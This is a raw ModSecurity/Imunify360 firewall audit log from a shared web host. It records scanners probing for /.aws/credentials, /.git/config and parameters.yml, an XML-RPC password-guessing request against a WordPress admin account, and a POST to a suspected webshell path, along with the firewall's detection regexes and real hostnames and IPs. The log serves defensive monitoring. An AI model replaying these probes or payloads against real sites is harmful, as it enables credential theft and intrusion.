"/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-jaipur/rajasthan-tours-from-delhi/rajasthan-tours-from-jodhpur/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-ahmedabad/images/Rajasthan-Travel-Guides/rajasthan-tours-from-jaipur/hotels-bikaner.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/rajasthan-tours-from-jaipur/rajasthan-tours-from-delhi/rajasthan-tours-from-jodhpur/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-ahmedabad/images/Rajasthan-Travel-Guides/rajasthan-tours-from-jaipur/hotels-bikaner.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/rajasthan-tours-from-jaipur/rajasthan-tours-from-delhi||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281543464866 18768 (- - -) Stopwatch2: 1751281543464866 18768; combined=4346, p1=219, p2=3992, p3=0, p4=0, p5=135, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --1db7a80d-Z-- --7a588c78-A-- [30/Jun/2025:16:35:54.580495 +0530] aGJvkn3h_Nu4NETt1nnNTAAAABI 192.253.209.91 18507 192.168.74.40 443 --7a588c78-B-- GET /.aws/credentials HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --7a588c78-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --7a588c78-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281554519651 61095 (- - -) Stopwatch2: 1751281554519651 61095; combined=5296, p1=147, p2=4949, p3=0, p4=0, p5=200, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --7a588c78-Z-- --d877e415-A-- [30/Jun/2025:16:35:59.254072 +0530] aGJvl0PJtoHs37kYh_RyzQAAAA8 20.171.207.232 34002 192.168.74.40 443 --d877e415-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/images/Car-Rentals-Agra.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --d877e415-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --d877e415-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/images/Car-Rentals-Agra.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/images/Car-Rentals-Agra.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/rajasthan-tours-from-Jaisalmer||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281559236448 17907 (- - -) Stopwatch2: 1751281559236448 17907; combined=4311, p1=167, p2=3962, p3=0, p4=0, p5=181, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --d877e415-Z-- --f2571e65-A-- [30/Jun/2025:16:36:03.559719 +0530] aGJvm9Uk2D1X90O_KpVjrgAAACc 192.253.209.89 11753 192.168.74.40 443 --f2571e65-B-- GET /app/config/parameters.yml HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --f2571e65-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --f2571e65-H-- Message: Match of "rx /wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/backups.min.js" against "REQUEST_URI" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/002_i360_basic.conf"] [line "12"] [id "77140739"] [msg "IM360 WAF: [RBL] Dirb like fuzzing||MVN:REQUEST_URI||MV:/app/config/parameters.yml||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Matched phrase "parameters.yml" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "9"] [id "77316758"] [msg "IM360 WAF: Private file access||QS:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281563505026 55003 (- - -) Stopwatch2: 1751281563505026 55003; combined=4893, p1=114, p2=4623, p3=0, p4=0, p5=155, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --f2571e65-Z-- --c37c1e23-A-- [30/Jun/2025:16:36:04.712015 +0530] aGJvnDX-tSYHdPnvNLtyNgAAACQ 162.240.226.172 47466 192.168.74.40 443 --c37c1e23-B-- POST /wp-content/plugins/metform/core/integrations/onboard/controls/settings/usergroup_5.php HTTP/1.1 Host: lovedale.us Cookie: [encoded value removed]
sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Accept: */* Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip,deflate Accept-Language: eo;q=0.8,en-US;q=0.6,en;q=0.4 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Content-Length: 307 Content-Type: application/x-www-form-urlencoded --c37c1e23-C-- -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --c37c1e23-Z-- --993ec83a-A-- [30/Jun/2025:16:36:05.283984 +0530] aGJvncxQ4V_D3FfouOGiQQAAACs 192.253.209.57 53389 192.168.74.40 443 --993ec83a-B-- GET /config/parameters.yml HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --993ec83a-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --993ec83a-H-- Message: Matched phrase "parameters.yml" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "9"] [id "77316758"] [msg "IM360 WAF: Private file access||QS:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281565236988 47385 (- - -) Stopwatch2: 1751281565236988 47385; combined=4891, p1=119, p2=4579, p3=0, p4=0, p5=193, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --993ec83a-Z-- --f857fc15-A-- [30/Jun/2025:16:36:06.167263 +0530] aGJvnkPJtoHs37kYh_Ry0wAAAA8 20.171.207.232 34002 192.168.74.40 443 --f857fc15-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/js/Rajasthan-Travel-Guides/Rajasthan-Travel-Guides/Agra-City-Guide.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --f857fc15-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --f857fc15-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/js/Rajasthan-Travel-Guides/Rajasthan-Travel-Guides/Agra-City-Guide.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/js/Rajasthan-Travel-Guides/Rajasthan-Travel-Guides/Agra-City-Guide.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/rajasthan-tours-from-Jaisalmer||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281566149740 17685 (- - -) Stopwatch2: 1751281566149740 17685; combined=4110, p1=185, p2=3775, p3=0, p4=0, p5=149, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --f857fc15-Z-- --1748460e-A-- [30/Jun/2025:16:36:06.724843 +0530] aGJvnkQBPIomKAIQWO76PQAAABw 192.253.209.77 24105 192.168.74.40 443 --1748460e-B-- GET /parameters.yml HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --1748460e-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --1748460e-H-- Message: Matched phrase "parameters.yml" at REQUEST_FILENAME. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "9"] [id "77316758"] [msg "IM360 WAF: Private file access||QS:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281566672524 52507 (- - -) Stopwatch2: 1751281566672524 52507; combined=4357, p1=109, p2=4066, p3=0, p4=0, p5=182, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --1748460e-Z-- --616e9165-A-- [30/Jun/2025:16:36:08.694247 +0530] aGJvoEPJtoHs37kYh_Ry1QAAAA8 20.171.207.232 34002 192.168.74.40 443 --616e9165-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/images/aainag/aaina/1/our-services.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --616e9165-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --616e9165-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/images/aainag/aaina/1/our-services.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/images/aainag/aaina/1/our-services.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281568677074 17316 (- - -) Stopwatch2: 1751281568677074 17316; combined=3195, p1=134, p2=2892, p3=0, p4=0, p5=168, sr=60, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ccb34318-Z-- --5fcb4249-A-- [30/Jun/2025:16:36:37.730695 +0530] aGJvvZwY0sPO8y2GDN8isAAAAEE 192.253.209.57 19897 192.168.74.40 443 --5fcb4249-B-- GET /.__info.php HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive --5fcb4249-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --5fcb4249-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281597675282 55733 (- - -) Stopwatch2: 1751281597675282 55733; combined=4407, p1=95, p2=4105, p3=0, p4=0, p5=207, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --5fcb4249-Z-- --474fa00b-A-- [30/Jun/2025:16:36:39.028222 +0530] aGJvvoTZFPsrPJex9_HiJAAAABA 192.253.209.75 8221 192.168.74.40 443 --474fa00b-B-- GET /.info.php HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept-Encoding: * Accept: */* Connection: keep-alive --474fa00b-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --474fa00b-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281598976233 52445 (- - -) Stopwatch2: 1751281598976233 52445; combined=5148, p1=114, p2=4879, p3=0, p4=0, p5=154, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --474fa00b-Z-- --8a6a695f-A-- [30/Jun/2025:16:36:47.695534 +0530] aGJvx6DP8LSAIpsv_Tt3aAAAAAk 20.171.207.232 44296 192.168.74.40 443 --8a6a695f-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/testimonials/rajasthan-destinations.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --8a6a695f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --8a6a695f-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/testimonials/rajasthan-destinations.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/testimonials/rajasthan-destinations.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281607676403 19227 (- - -) Stopwatch2: 1751281607676403 19227; combined=4268, p1=165, p2=3921, p3=0, p4=0, p5=182, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --5c5a6f7e-Z-- --c1cc992a-A-- [30/Jun/2025:16:42:10.468188 +0530] aGJxCZfZSveyRzhF9t0ojQAAAAU 196.251.80.2 38118 192.168.74.40 443 --c1cc992a-B-- GET /.git/config HTTP/1.1 Host: 103.185.74.40 User-Agent: python-requests/2.32.4 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive --c1cc992a-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Encoding: gzip Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --c1cc992a-H-- Message: Match of "rx /wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/backups.min.js" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/002_i360_basic.conf"] [line "12"] [id "77140739"] [msg "IM360 WAF: [RBL] Dirb like fuzzing||MVN:REQUEST_URI||MV:/.git/config||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Message: String match "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "349"] [id "77318034"] [msg "IM360 WAF: Blocked access to git folder||RSV:7.05||RS:0||T:APACHE||MV:/.git/config||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281929904910 563513 (- - -) Stopwatch2: 1751281929904910 563513; combined=4495, p1=106, p2=4247, p3=0, p4=0, p5=142, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --c1cc992a-Z-- --25964162-A-- [30/Jun/2025:16:42:11.710456 +0530] aGJxCzBzgd_O0rYT2N05XgAAACk 34.86.223.42 64122 192.168.74.40 443 --25964162-B-- POST //xmlrpc.php HTTP/1.1 Host: elliottlabsindia.com Keep-Alive: 300 Connection: keep-alive Cookie: pikoworks_products_list_per_page=5; pikoworks_products_grid_per_page=9; pikoworks_products_mode_view=grid User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml Content-Length: 489 --25964162-C-- <?xml version="1.0"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data> <value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>admin</string></value><value><string>z43218765z</string></value></data></array></value></data></array></value></member></struct></value> </data></array></value></param></params></methodCall> --25964162-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 X-Robots-Tag: noindex, follow -- Message: Match of 
"pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Stopwatch: 1751283903241283 8141 (- - -) Stopwatch2: 1751283903241283 8141; combined=5149, p1=132, p2=4745, p3=115, p4=4, p5=153, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --dfa8d57b-Z-- --b8fa854c-A-- [30/Jun/2025:17:15:05.287948 +0530] aGJ4v4EbmuRAqClpHrE-8wAAABw 103.185.74.40 31399 192.168.74.40 443 --b8fa854c-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --b8fa854c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --b8fa854c-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751283903318023 1970328 (- - -) Stopwatch2: 1751283903318023 1970328; combined=3353, p1=113, p2=3088, p3=0, p4=0, p5=152, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --b8fa854c-Z-- --029adf45-A-- [30/Jun/2025:17:15:06.791214 +0530] aGJ4wdoXULVP1MP-O9SamAAAABs 103.185.74.40 30465 192.168.74.40 443 --029adf45-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --029adf45-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --029adf45-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751283905497777 1293684 (- - -) Stopwatch2: 1751283905497777 1293684; combined=2134, p1=88, p2=1890, p3=0, p4=0, p5=156, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
